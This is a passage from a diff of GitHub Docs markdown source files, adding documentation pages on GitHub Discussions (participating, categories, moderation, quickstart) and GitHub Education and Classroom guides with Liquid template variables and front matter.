variables.product.product_name %}. permissions: People with read permissions to a repository can participate in discussions in the repository. versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### About participation in a discussion {% data reusables.discussions.about-discussions %} For more information, see "[About discussions](/discussions/collaborating-with-your-community-using-discussions/about-discussions)." In addition to starting or viewing a discussion, you can comment in response to the original comment from the author of the discussion. You can also create a comment thread by replying to an individual comment that another community member made within the discussion, and react to comments with emoji. For more information about reactions, see "[About conversations on {% data variables.product.prodname_dotcom %}](/github/collaborating-with-issues-and-pull-requests/about-conversations-on-github#reacting-to-ideas-in-comments)." You can block users and report disruptive content to maintain a safe and pleasant environment for yourself on {% data variables.product.product_name %}. For more information, see "[Maintaining your safety on {% data variables.product.prodname_dotcom %}](/github/building-a-strong-community/maintaining-your-safety-on-github)." ### Prerequisites Discussions must be enabled for the repository for you to participate in a discussion in the repository. For more information, see "[Enabling or disabling discussions for a repository](/github/administering-a-repository/enabling-or-disabling-github-discussions-for-a-repository)." ### Creating a discussion {% data reusables.discussions.starting-a-discussion %} ### Marking a comment as an answer Discussion authors and users with the triage role or greater for a repository can mark a comment as the answer to a discussion in the repository. {% data reusables.discussions.marking-a-comment-as-an-answer %} 49 content/discussions/guides/best-practices-for-community-conversations-on-github.md @@ -0,0 +1,49 @@ --- title: Best practices for community conversations on GitHub shortTitle: Best practices for community conversations intro: 'You can use discussions to brainstorm with your team, and eventually move the conversation to a discussion when you are ready to scope out the work.' versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### Community conversations in {% data variables.product.prodname_discussions %} Since {% data variables.product.prodname_discussions %} is an open forum, there is an opportunity to bring non-code collaboration into a project's repository and gather diverse feedback and ideas more quickly. You can help drive a productive conversation by: - Asking pointed questions and follow-up questions to garner specific feedback - Capture a diverse experience and distill it down to main points - Open an issue to take action based on the conversation, where applicable For more information about opening an issue and cross-referencing a discussion, see "[Opening an issue from a comment](/github/managing-your-work-on-github/opening-an-issue-from-a-comment)." ### Learning about conversations on GitHub You can create and participate in discussions, issues, and pull requests, depending on the type of conversation you'd like to have. You can use {% data variables.product.prodname_discussions %} to discuss big picture ideas, brainstorm, and spike out a project's specific details before committing it to an issue, which can then be scoped. Discussions are useful for teams if: - You are in the discovery phase of a project and are still learning which director your team wants to go in - You want to collect feedback from a wider community about a project - You want to keep bug fixes, feature requests, and general conversations separate Issues are useful for discussing specific details of a project such as bug reports and planned improvements. For more information, see "[About issues](/articles/about-issues)." Pull requests allow you to comment directly on proposed changes. For more information, see "[About pull requests](/articles/about-pull-requests)" and "[Commenting on a pull request](/articles/commenting-on-a-pull-request)." {% data reusables.organizations.team-discussions-purpose %} For more information, see "[About team discussions](/articles/about-team-discussions)." ### Following contributing guidelines Before you open a discussion, check to see if the repository has contributing guidelines. The CONTRIBUTING file includes information about how the repository maintainer would like you to contribute ideas to the project. For more information, see "[Setting up your project for healthy contributions](/github/building-a-strong-community/setting-up-your-project-for-healthy-contributions)." ### Next steps To continue learning about {% data variables.product.prodname_discussions %} and quickly create a discussion for your community, see "[Quickstart for {% data variables.product.prodname_discussions %}](/discussions/quickstart)." ### Further reading - "[Setting up your project for healthy contributions](/articles/setting-up-your-project-for-healthy-contributions)" - "[Using templates to encourage useful issues and pull requests](/github/building-a-strong-community/using-templates-to-encourage-useful-issues-and-pull-requests)" - "[Moderating comments and conversations](/articles/moderating-comments-and-conversations)" - "[Writing on {% data variables.product.prodname_dotcom %}](/articles/writing-on-github)" 21 content/discussions/guides/finding-discussions-across-multiple-repositories.md @@ -0,0 +1,21 @@ --- title: Finding discussions across multiple repositories intro: 'You can easily access every discussion you''ve created or participated in across multiple repositories.' versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### Finding discussions 1. Navigate to {% data variables.product.prodname_dotcom_the_website %}. 1. In the top-right corner of {% data variables.product.prodname_dotcom_the_website %}, click your profile photo, then click **Your enterprises**.  1. Toggle between **Created** and **Commented** to see the discussions you've created or participated in. ### Further reading - "[Searching discussions](/github/searching-for-information-on-github/searching-discussions)" - "[About discussions](/discussions/collaborating-with-your-community-using-discussions/about-discussions)" - "[Managing discussions for your community](/discussions/managing-discussions-for-your-community)" 32 content/discussions/guides/granting-higher-permissions-to-top-contributors.md @@ -0,0 +1,32 @@ --- title: Granting higher permissions to top contributors intro: 'Repository administrators can promote any community member to a moderator and maintainer.' versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### Introduction The most helpful contributors for the past 30 days are highlighted on the {% data variables.product.prodname_discussions %} dashboard, based on how many comments were marked as answers by other community members. Helpful contributors can help drive a healthy community and moderate and guide the community space in addition to maintainers. ### Step 1: Audit your discussions top contributors {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} 1. Compare the list of contributors with their access permissions to see who qualifies to moderate the discussion. ### Step 2: Review permission levels for discussions People with triage permissions for a repository can help moderate a project's discussions by marking comments as answers, locking discussions that are not longer useful or are damaging to the community, and converting issues to discussions when an idea is still in the early stages of development. For more information, see "[Moderating discussions](/discussions/managing-discussions-for-your-community/moderating-discussions)." For more information about repository permission levels and {% data variables.product.prodname_discussions %}, see "[Repository permissions levels for an organization](/github/setting-up-and-managing-organizations-and-teams/repository-permission-levels-for-an-organization)." ### Step 3: Change permissions levels for top contributors You can change a contributor's permission levels to give them more access to the tooling they need to moderate GitHub Discussions. To change a person's or team's permission levels, see "[Managing teams and people with access to your repository](/github/administering-a-repository/managing-teams-and-people-with-access-to-your-repository)." ### Step 4: Notify community members of elevated access When you change a collaborators permission level, they will receive a notification for the change. 29 content/discussions/guides/index.md @@ -0,0 +1,29 @@ --- title: Discussions guides shortTitle: Guides intro: 'Discover pathways to get started or learn best practices for participating or monitoring your community''s discussions.' versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### Getting started with discussions {% link_in_list /about-discussions %} {% link_in_list /best-practices-for-community-conversations-on-github %} {% link_in_list /finding-discussions-across-multiple-repositories %} <!-- {% link_in_list /managing-notifications-for-discussions %} --> ### Administering discussions {% link_in_list /granting-higher-permissions-to-top-contributors %} <!--<!-- Commenting out what is only nice to have for discussions release {% link_in_list /updating-your-contributing-guidelines-with-discussions %} --> <!-- ### Discussions and open source projects {% link_in_list /collaborating-on-open-source-projects-in-discussions %} {% link_in_list /welcoming-contributions-to-your-communitys-discussions %} --> 55 content/discussions/index.md @@ -0,0 +1,55 @@ --- title: GitHub Discussions Documentation beta_product: true shortTitle: GitHub Discussions intro: '{% data variables.product.prodname_discussions %} is a collaborative communication forum for the community around an open source project. Community members can ask and answer questions, share updates, have open-ended conversations, and follow along on decisions affecting the community''s way of working.' introLinks: quickstart: /discussions/quickstart featuredLinks: guides: - /discussions/collaborating-with-your-community-using-discussions/about-discussions - /discussions/collaborating-with-your-community-using-discussions/participating-in-a-discussion - /discussions/managing-discussions-for-your-community/moderating-discussions gettingStarted: - /discussions/quickstart guideCards: - /discussions/collaborating-with-your-community-using-discussions/about-discussions - /discussions/collaborating-with-your-community-using-discussions/participating-in-a-discussion - /discussions/managing-discussions-for-your-community/moderating-discussions popular: - /discussions/guides/granting-higher-permissions-to-top-contributors - /discussions/guides/best-practices-for-community-conversations-on-github - /discussions/guides/finding-discussions-across-multiple-repositories - /discussions/collaborating-with-your-community-using-discussions/collaborating-with-maintainers-using-discussions - /discussions/managing-discussions-for-your-community/managing-categories-for-discussions-in-your-repository product_video: https://www.youtube-nocookie.com/embed/DbTWBP3_RbM layout: product-landing versions: free-pro-team: '*' --- <!-- {% link_with_intro /quickstart %} --> <!-- {% link_with_intro /discussions-guides %} --> <!-- {% link_with_intro /collaborating-with-your-community-using-discussions %} --> <!-- {% link_with_intro /managing-discussions-for-your-community %} --> <!-- Community examples --> {% assign discussionsCommunityExamples = site.data.variables.discussions_community_examples %} {% if discussionsCommunityExamples %} <div class="my-6 pt-6"> <h2 class="mb-2 font-mktg h1">Communities using discussions</h2> <div class="d-flex flex-wrap gutter"> {% render 'discussions-community-card' for discussionsCommunityExamples as example %} </div> {% if discussionsCommunityExamples.length > 6 %} <button class="js-filter-card-show-more btn btn-outline float-right">Show more {% octicon "arrow-right" %}</button> {% endif %} <div class="js-filter-card-no-results d-none py-4 text-center text-gray font-mktg"> <div class="mb-3">{% octicon "search" width="24" %}</div> <h3 class="text-normal">Sorry, there is no result for <strong class="js-filter-card-value"></strong></h3> <p class="my-3 f4">It looks like we don't have an example that fits your filter.<br>Try another filter or add your code example</p> <a href="https://github.com/github/docs/blob/main/data/variables/discussions_community_examples.yml">Add your community {% octicon "arrow-right" %}</a> </div> </div> {% endif %} 13 content/discussions/managing-discussions-for-your-community/index.md @@ -0,0 +1,13 @@ --- title: Managing discussions for your community shortTitle: Managing discussions intro: 'You can enable and configure discussions for your repository, and you can use tools on {% data variables.product.product_name %} to moderate conversations among community members.' versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} {% link_in_list /managing-discussions-in-your-repository %} {% link_in_list /managing-categories-for-discussions-in-your-repository %} {% link_in_list /moderating-discussions %} 64 ...ns-for-your-community/managing-categories-for-discussions-in-your-repository.md @@ -0,0 +1,64 @@ --- title: Managing categories for discussions in your repository intro: You can categorize the discussions in your repository to organize conversations for your community members, and you can choose a format for each category. permissions: Repository administrators and people with write or greater access to a repository can enable discussions in the repository. versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### About categories for discussions {% data reusables.discussions.about-discussions %} {% data reusables.discussions.about-categories-and-formats %} Each category must have a unique name and emoji pairing, and can be accompanied by a detailed description stating its purpose. Categories help maintainers organize how conversations are filed and are customizable to help distinguish categories that are Q&A or more open-ended conversations.{% data reusables.discussions.repository-category-limit %} For more information, see "[About discussions](/discussions/collaborating-with-your-community-using-discussions/about-discussions#about-categories-and-formats-for-discussions)." ### Default categories | Category | Purpose | Type | | :- | :- | :- | | #️⃣ General | Anything and everything relevant to the project | Open-ended discussion | |💡Ideas | Ideas to change or improve the project | Open-ended discussion | | 🙏 Q&A | Questions for the community to answer, with a question/answer format | Question and Answer | | 🙌 Show and tell | Creations, experiments, or tests relevant to the project | Open-ended discussion | ### Creating a category {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} {% data reusables.discussions.edit-categories %} 1. Click **New category**.  1. Edit the emoji, title, description, and discussion format for the category. For more information about discussion formats, see "[About discussions](/discussions/collaborating-with-your-community-using-discussions/about-discussions#about-categories-and-formats-for-discussions)."  1. Click **Create**.  ### Editing a category You can edit a category to change the category's emoji, title, description, and discussion format. {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} 1. To the right of a category in the list, click {% octicon "pencil" aria-label="The pencil icon" %}.  1. {% data reusables.discussions.edit-category-details %}  1. Click **Save changes**.  ### Deleting a category When you delete a category, {% data variables.product.product_name %} will move all discussions in the deleted category to an existing category that you choose. {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} 1. To the right of a category in the list, click {% octicon "trash" aria-label="The trash icon" %}.  1. Use the drop-down menu, and choose a new category for any discussions in the category you're deleting.  1. Click **Delete & Move**.  108 ...aging-discussions-for-your-community/managing-discussions-in-your-repository.md @@ -0,0 +1,108 @@ --- title: Managing discussions in your repository intro: You can categorize, spotlight, transfer, or delete the discussions in a repository. permissions: Repository administrators and people with write or greater access to a repository can manage discussions in the repository. versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### About management of discussions {% data reusables.discussions.about-discussions %} For more information about discussions, see "[About discussions](/discussions/collaborating-with-your-community-using-discussions/about-discussions)." Organization owners can choose the permissions required to create a discussion for repositories owned by the organization. For more information, see "[Managing discussion creation for repositories in your organization](/github/setting-up-and-managing-organizations-and-teams/managing-discussion-creation-for-repositories-in-your-organization)." As a discussions maintainer, you can create community resources to encourage discussions that are aligned with the overall project goal and maintain a friendly open forum for collaborators. Creating a code of conduct or contribution guidelines for collaborators to follow will help facilitate a collaborative and productive forum. For more information on creating community resources, see "[Adding a code of conduct to your project](/github/building-a-strong-community/adding-a-code-of-conduct-to-your-project)," and "[Setting guidelines for repository contributors](/github/building-a-strong-community/setting-guidelines-for-repository-contributors)." For more information on facilitating a healthy discussion, see "[Moderating comments and conversations](/github/building-a-strong-community/moderating-comments-and-conversations)." ### Prerequisites To manage discussions in a repository, discussions must be enabled for the repository. For more information, see "[Enabling or disabling discussions for a repository](/github/administering-a-repository/enabling-or-disabling-github-discussions-for-a-repository)." ### Changing the category for a discussion You can categorize discussions to help community members find related discussions. For more information, see "[Managing categories for discussions in your repository](/discussions/managing-discussions-for-your-community/managing-categories-for-discussions-in-your-repository)" article. You can also move a discussion to a different category. {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} {% data reusables.discussions.click-discussion-in-list %} 1. In the right sidebar, click {% octicon "pencil" aria-label="The pencil icon" %} **Edit pinned discussion**.  ### Pinning a discussion You can pin up to four important discussions above the list of discussions for the repository. {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} {% data reusables.discussions.click-discussion-in-list %} 1. In the right sidebar, click {% octicon "pin" aria-label="The pin icon" %} **Pin discussion**.  1. Optionally, customize the look of the pinned discussion.  1. Click **Pin discussion**.  ### Editing a pinned discussion Editing a pinned discussion will not change the discussion's category. For more information, see "[Managing categories for discussions in your repository](/discussions/managing-discussions-for-your-community/managing-categories-for-discussions-in-your-repository)." {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} {% data reusables.discussions.click-discussion-in-list %} 1. In the right sidebar, click {% octicon "pencil" aria-label="The pencil icon" %} **Edit pinned discussion**.  1. Customize the look of the pinned discussion.  1. Click **Pin discussion**.  ### Unpinning a discussion {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} {% data reusables.discussions.click-discussion-in-list %} 1. In the right sidebar, click {% octicon "pin" aria-label="The pin icon" %} **Unpin discussion**.  1. Read the warning, then click **Unpin discussion**.  ### Transferring a discussion To transfer a discussion, you must have permissions to create discussions in the repository where you want to transfer the discussion. {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} {% data reusables.discussions.click-discussion-in-list %} 1. In the right sidebar, click {% octicon "arrow-right" aria-label="The right arrow icon" %} **Transfer discussion**.  1. Select the **Choose a repository** drop-down, and click the repository you want to transfer the discussion to.  1. Click **Transfer discussion**.  ### Deleting a discussion {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} {% data reusables.discussions.click-discussion-in-list %} 1. In the right sidebar, click {% octicon "trash" aria-label="The trash arrow icon" %} **Delete discussion**.  1. Read the warning, then click **Delete this discussion**.  ### Converting issues based on labels You can convert all issues with the same label to discussions in bulk. Future issues with this label will also automatically convert to the discussion and category you configure. {% data reusables.repositories.navigate-to-repo %} {% data reusables.repositories.sidebar-issues %} {% data reusables.project-management.labels %} 1. Next to the label you want to convert to issues, click **Convert issues**. 1. Select the **Choose a category** drop-down menu, and click a category for your discussion. 1. Click **I understand, convert this issue to a discussion**. 40 ...t/discussions/managing-discussions-for-your-community/moderating-discussions.md @@ -0,0 +1,40 @@ --- title: Moderating discussions intro: 'You can promote healthy collaboration by marking comments as answers, locking or unlocking discussions, and converting issues to discussions. and editing or deleting comments, discussions, and categories that don''t align with your community''s code of conduct to discussions.' permissions: People with triage access to a repository can moderate discussions in the repository. versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### About moderating discussions {% data reusables.discussions.about-discussions %} If you have triage permissions for a repository, you can help moderate a project's discussions by marking comments as answers, locking discussions that are not longer useful or are damaging to the community, and converting issues to discussions when an idea is still in the early stages of development. ### Marking a comment as an answer {% data reusables.discussions.marking-a-comment-as-an-answer %} ### Locking discussions It's appropriate to lock a conversation when the entire conversation is not constructive or violates your community's code of conduct or {% data variables.product.prodname_dotcom %}'s [Community Guidelines](/github/site-policy/github-community-guidelines). You can also lock a conversation to prevent comments on a discussion you want to use as an announcement to the community. When you lock a conversation, people with write access to the repository will still be able to comment on the discussion. {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} 1. In the list of discussions, click the discussion you want to lock.  1. In the right margin of a discussion, click **Lock conversation**. 1. Read the information about locking conversations and click **Lock conversation on this discussion**. 1. When you're ready to unlock the conversation, click **Unlock conversation**, then click **Unlock conversation on this discussion**. ### Converting an issue to a discussion When you convert an issue to a discussion, the discussion is automatically created using the content from the issue. People with write access to a repository can bulk convert issues based on labels. For more information, see "[Managing discussions in your repository](/discussions/managing-discussions-for-your-community/managing-discussions-in-your-repository)." {% data reusables.repositories.navigate-to-repo %} {% data reusables.repositories.sidebar-issues %} 1. In the list of issues, click the issue you'd like to convert. 1. In the right margin of an issue, click **Convert to discussion**. 1. Select the **Choose a category** drop-down menu, and click a category for your discussion. 1. Click **I understand, convert this issue to a discussion**. 62 content/discussions/quickstart.md @@ -0,0 +1,62 @@ --- title: Quickstart for GitHub Discussions intro: 'Enable {% data variables.product.prodname_discussions %} on an existing repository and start conversations with your community.' allowTitleToDifferFromFilename: true versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### Introduction {% data variables.product.prodname_discussions %} is a collaborative communication forum for the community around an open source project. Discussions are for conversations that need to be transparent and accessible but do not need to be tracked on a project board and are not related to code, unlike issues. Discussions enable fluid, open conversation in a public forum. Discussions give a space for more collaborative conversations by connecting and giving a more centralized area to connect and find information. ### Enabling {% data variables.product.prodname_discussions %} on your repository Repository owners and people with write access can enable {% data variables.product.prodname_discussions %} for a community on their public repositories. When you first enable a {% data variables.product.prodname_discussions %}, you will be invited to configure a welcome post. {% data reusables.repositories.navigate-to-repo %} 1. Under your repository name, click {% octicon "gear" aria-label="The gear icon" %} **Settings**.  1. Under "Features", click **Set up discussions**.  1. Under "Start a new discussion," edit the template to align with the resources and tone you want to set for your community. 1. Click **Start discussion**.  ### Welcoming contributions to your discussions You can welcome your community and introduce a new way to communicate in a repository by creating a welcome post and pin the post to your {% data variables.product.prodname_discussions %} page. Pinning and locking discussions helps people know that a post is meant as an announcement. You can use announcements as a way to link people to more resources and offer guidance for opening discussions in your community. For more information about pinning a discussion, see "[Managing discussions in your repository](/discussions/managing-discussions-for-your-community/managing-discussions-in-your-repository#pinning-a-discussion)." ### Setting up community guidelines for contributors You can set contributing guidelines to encourage collaborators to have meaningful, useful conversations that are relevant to the repository. You can also update the repository's README to communicate expectations on when collaborators should open an issue or discussion. For more information about providing guidelines for your project, see "[Adding a code of conduct to your project](/github/building-a-strong-community/adding-a-code-of-conduct-to-your-project)" and "[Setting up your project for healthy contributions](/github/building-a-strong-community/setting-up-your-project-for-healthy-contributions)." ### Creating a new discussion Anyone with access to a repository can create a discussion. {% data reusables.discussions.starting-a-discussion %} ### Organizing discussions into relevant categories Repository owners and people with write access can create new categories to keep discussions organized. Collaborators participating and creating new discussions can group discussions into the most relevant existing categories. Discussions can also be recategorized after they are created. For more information, see "[Managing categories for discussions in your repository](/discussions/managing-discussions-for-your-community/managing-categories-for-discussions-in-your-repository)" ### Promoting healthy conversations People with write permissions for a repository can help surface important conversations by pinning discussions, deleting discussions that are no longer useful or are damaging to the community, and transferring discussions to more relevant repositories owned by the organization. For more information, see "[Managing discussions in your repository](/discussions/managing-discussions-for-your-community/managing-discussions-in-your-repository)." People with triage permissions for a repository can help moderate a project's discussions by marking comments as answers, locking discussions that are not longer useful or are damaging to the community, and converting issues to discussions when an idea is still in the early stages of development. For more information, see "[Moderating discussions](/discussions/managing-discussions-for-your-community/moderating-discussions)." ### Next steps Once there is a clear path to scope work out and move an idea from concept to reality, you can create an issue and start tracking your progress. For more information on creating an issue from a discussion, see "[Moderating discussions](/discussions/managing-discussions-for-your-community/moderating-discussions)." 45 content/education/guides.md @@ -0,0 +1,45 @@ --- title: Guides for GitHub Education intro: 'These guides for {% data variables.product.prodname_education %} help you teach and learn both {% data variables.product.product_name %} and software development.' allowTitleToDifferFromFilename: true versions: free-pro-team: '*' --- ### Get started with {% data variables.product.product_name %} Teachers, students, and researchers can use tools from {% data variables.product.product_name %} to enrich a software development curriculum and develop real-world collaboration skills. - [Sign up for a new {% data variables.product.prodname_dotcom %} account](/github/getting-started-with-github/signing-up-for-a-new-github-account) - [Git and {% data variables.product.prodname_dotcom %} quickstart ](/github/getting-started-with-github/quickstart) - [Apply for an educator or researcher discount](/education/teach-and-learn-with-github-education/apply-for-an-educator-or-researcher-discount) - [Apply for a student developer pack](/education/teach-and-learn-with-github-education/apply-for-a-student-developer-pack) ### Run a software development course with {% data variables.product.company_short %} Administer a classroom, assign and review work from your students, and teach the new generation of software developers with {% data variables.product.prodname_classroom %}. - [Basics of setting up {% data variables.product.prodname_classroom %} ](/education/manage-coursework-with-github-classroom/basics-of-setting-up-github-classroom) - [Manage classrooms](/education/manage-coursework-with-github-classroom/manage-classrooms) - [Create an individual assignment](/education/manage-coursework-with-github-classroom/create-an-individual-assignment) - [Create a group assignment](/education/manage-coursework-with-github-classroom/create-a-group-assignment) - [Create an assignment from a template repository](/education/manage-coursework-with-github-classroom/create-an-assignment-from-a-template-repository) - [Leave feedback with pull requests](/education/manage-coursework-with-github-classroom/leave-feedback-with-pull-requests) - [Use autograding](/education/manage-coursework-with-github-classroom/use-autograding) ### Learn to develop software Incorporate {% data variables.product.prodname_dotcom %} into your education, and use the same tools as the professionals. - [Git and {% data variables.product.prodname_dotcom %} learning resources](/github/getting-started-with-github/git-and-github-learning-resources) - [Use {% data variables.product.prodname_dotcom %} for your schoolwork](/education/teach-and-learn-with-github-education/use-github-for-your-schoolwork) - [Try {% data variables.product.prodname_desktop %}](/desktop) - [Try {% data variables.product.prodname_cli %}](/github/getting-started-with-github/github-cli) ### Contribute to the community Participate in the community, get training from {% data variables.product.company_short %}, and learn or teach new skills. - [{% data variables.product.prodname_education_community %}](https://education.github.community) - [About Campus Experts](/education/teach-and-learn-with-github-education/about-campus-experts) - [About Campus Advisors](/education/teach-and-learn-with-github-education/about-campus-advisors) 43 content/education/index.md @@ -0,0 +1,43 @@ --- title: GitHub Education Documentation shortTitle: Education intro: "{% data variables.product.prodname_education %} helps you teach or learn software development with the tools and support of {% data variables.product.company_short %}'s platform and community." introLinks: quickstart: /education/quickstart featuredLinks: guides: - /education/teach-and-learn-with-github-education/apply-for-a-student-developer-pack - /education/teach-and-learn-with-github-education/apply-for-an-educator-or-researcher-discount - /education/teach-and-learn-with-github-education/use-github-at-your-educational-institution guideCards: - /github/getting-started-with-github/signing-up-for-a-new-github-account - /github/getting-started-with-github/git-and-github-learning-resources - /education/manage-coursework-with-github-classroom/basics-of-setting-up-github-classroom popular: - /education/teach-and-learn-with-github-education/use-github-for-your-schoolwork - /education/teach-and-learn-with-github-education/use-github-in-your-classroom-and-research - /desktop - /github/getting-started-with-github/github-cli - /education/manage-coursework-with-github-classroom/teach-with-github-classroom changelog: - title: 'Try something new at Local Hack Day: Learn' date: '2020-10-15' href: https://github.blog/2020-10-15-try-something-new-at-local-hack-day-learn/ - title: 'Remote Education: Creating community through shared experiences' date: '2020-09-24' href: https://github.blog/2020-09-24-remote-education-creating-community-through-shared-experiences/ - title: 'Remote Education: A series of best practices for online campus communities' date: '2020-09-10' href: https://github.blog/2020-09-10-remote-education-a-series-of-best-practices-for-online-campus-communities/ - title: Welcome to the inaugural class of MLH Fellows date: '2020-06-24' href: https://github.blog/2020-06-24-welcome-to-the-inaugural-class-of-mlh-fellows/ layout: product-landing versions: free-pro-team: '*' --- <!-- {% link_with_intro /teach-and-learn-with-github-education %} --> <!-- {% link_with_intro /manage-coursework-with-github-classroom %} --> 31 ...work-with-github-classroom/about-using-makecode-arcade-with-github-classroom.md @@ -0,0 +1,31 @@ --- title: About using MakeCode Arcade with GitHub Classroom shortTitle: About using MakeCode Arcade intro: You can configure MakeCode Arcade as the online IDE for assignments in {% data variables.product.prodname_classroom %}. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/student-experience-makecode --- ### About MakeCode Arcade MakeCode Arcade is an online integrated development environment (IDE) for developing retro arcade games using drag-and-drop block programming and JavaScript. Students can write, edit, run, test, and debug code in a browser with MakeCode Arcade. For more information about online IDEs and {% data variables.product.prodname_classroom %}, see "[Integrate {% data variables.product.prodname_classroom %} with an online IDE](/education/manage-coursework-with-github-classroom/integrate-github-classroom-with-an-online-ide)." {% data reusables.classroom.readme-contains-button-for-online-ide %} The first time the student clicks the button to visit MakeCode Arcade, the student must sign into MakeCode Arcade with {% data variables.product.product_name %} credentials. After signing in, the student will have access to a development environment containing the code from the assignment repository, fully configured on MakeCode Arcade. For more information about working on MakeCode Arcade, see the [MakeCode Arcade Tour](https://arcade.makecode.com/ide-tour) and [documentation](https://arcade.makecode.com/docs) on the MakeCode Arcade website. MakeCode Arcade does not support multiplayer-editing for group assignments. Instead, students can collaborate with Git and {% data variables.product.product_name %} features like branches and pull requests. ### About submission of assignments with MakeCode Arcade By default, MakeCode Arcade is configured to push to the assignment repository on {% data variables.product.product_location %}. After making progress on an assignment with MakeCode Arcade, students should push changes to {% data variables.product.product_location %} using the {% octicon "mark-github" aria-label="The GitHub mark" %}{% octicon "arrow-up" aria-label="The up arrow icon" %} button at the bottom of the screen.  ### Further reading - "[About READMEs](/github/creating-cloning-and-archiving-repositories/about-readmes)" 33 ...ge-coursework-with-github-classroom/about-using-replit-with-github-classroom.md @@ -0,0 +1,33 @@ --- title: About using Repl.it with GitHub Classroom shortTitle: About using Repl.it intro: You can configure Repl.it as the online integrated development environment (IDE) for assignments in {% data variables.product.prodname_classroom %}. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/student-experience-replit --- ### About Repl.it Repl.it is an online integrated development environment (IDE) that supports multiple programming languages. Students can write, edit, run, test, and debug code in a browser with Repl.it. For more information about online IDEs and {% data variables.product.prodname_classroom %}, see "[Integrate {% data variables.product.prodname_classroom %} with an online IDE](/education/manage-coursework-with-github-classroom/integrate-github-classroom-with-an-online-ide)." {% data reusables.classroom.readme-contains-button-for-online-ide %} The first time the student clicks the button to visit Repl.it, the student must sign into Repl.it with {% data variables.product.product_name %} credentials. After signing in, the student will have access to a development environment containing the code from the assignment repository, fully configured on Repl.it. For more information about working on Repl.it, see the [Repl.it Quickstart Guide](https://docs.repl.it/misc/quick-start#the-repl-environment). For group assignments, students can use Repl.it Multiplayer to work collaboratively. For more information, see the [Repl.it Multiplayer](https://repl.it/site/multiplayer) website. ### About submission of assignments with Repl.it By default, Repl.it is configured to push to the assignment repository on {% data variables.product.product_location %}. After making progress on an assignment with Repl.it, students should push changes to {% data variables.product.product_location %} using the version control functionality in the left sidebar.  For more information about using Git on Repl.it, see the [Repl.it + Git Tutorial](https://repl.it/talk/learn/Replit-Git-Tutorial/23331) on the Repl.it website. ### Further reading - "[About READMEs](/github/creating-cloning-and-archiving-repositories/about-readmes)" 33 ...anage-coursework-with-github-classroom/basics-of-setting-up-github-classroom.md @@ -0,0 +1,33 @@ --- title: Basics of setting up GitHub Classroom shortTitle: '{% data variables.product.prodname_classroom %} basics' intro: Learn how to set up your classroom, manage assignments, and configure time-saving automation. versions: free-pro-team: '*' --- ### Videos about {% data variables.product.prodname_classroom %} You can watch a series of short video tutorials about the configuration and use of {% data variables.product.prodname_classroom %}. To watch all videos as part of a continuous playlist, see the [{% data variables.product.prodname_classroom %} Getting Started Guide](https://www.youtube.com/playlist?list=PLIRjfNq867bewk3ZGV6Z7a16YDNRCpK3u) on YouTube. For more information about terminology for {% data variables.product.prodname_classroom %}, see "[Glossary](/education/manage-coursework-with-github-classroom/glossary)". 1. <a href="https://youtu.be/xVVeqIDgCvM" target="_blank">Getting started</a> {% octicon "link-external" aria-label="The external link icon" %} 2. <a href="https://youtu.be/DTzrKduaHj8" target="_blank">Adding your student roster</a> {% octicon "link-external" aria-label="The external link icon" %} 3. Creating assignments - <a href="https://youtu.be/6QzKZ63KLss" target="_blank">Creating an assignment using a {% data variables.product.prodname_dotcom %} repository</a> {% octicon "link-external" aria-label="The external link icon" %} - <a href="https://youtu.be/Qmwh6ijsQJU" target="_blank">Creating an assignment using Microsoft MakeCode as your online IDE</a> {% octicon "link-external" aria-label="The external link icon" %} - <a href="https://youtu.be/p_g5sQ7hUis" target="_blank">Creating an assignment using Repl.it as your online IDE</a> {% octicon "link-external" aria-label="The external link icon" %} 4. <a href="https://youtu.be/ObaFRGp_Eko" target="_blank">How students complete assignments</a> {% octicon "link-external" aria-label="The external link icon" %} 5. <a href="https://youtu.be/g45OJn3UyCU" target="_blank">How teachers review assignments</a> {% octicon "link-external" aria-label="The external link icon" %} 6. <a href="https://youtu.be/QxrA3taZdNM" target="_blank">Creating group assignments</a> {% octicon "link-external" aria-label="The external link icon" %} 7. <a href="https://youtu.be/tJK2cmoh1KM" target="_blank">Next steps to get started</a> {% octicon "link-external" aria-label="The external link icon" %} 8. <a href="https://youtu.be/X87v3SFQxLU" target="_blank">{% data variables.product.prodname_dotcom %} Teacher Toolbox</a> {% octicon "link-external" aria-label="The external link icon" %} ### Next steps For more information about teaching with {% data variables.product.prodname_classroom %}, see "[Teach with {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/teach-with-github-classroom)." ### Further reading - "[Teach and learn with {% data variables.product.prodname_education %}](/education/teach-and-learn-with-github-education)" 51 ...with-github-classroom/configure-default-settings-for-assignment-repositories.md @@ -0,0 +1,51 @@ --- title: Configure default settings for assignment repositories shortTitle: Configure defaults for assignment repositories intro: You can use the Probot Settings app to configure the default settings for repositories that {% data variables.product.prodname_classroom %} creates for an assignment. permissions: Organization owners can configure default settings for assignment repositories by installing a {% data variables.product.prodname_github_app %} for the organization. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/probot-settings --- ### About configuration of defaults for assignment repositories {% data variables.product.prodname_classroom %} creates a repository that belongs for each student or team that accepts an assignment. The repository 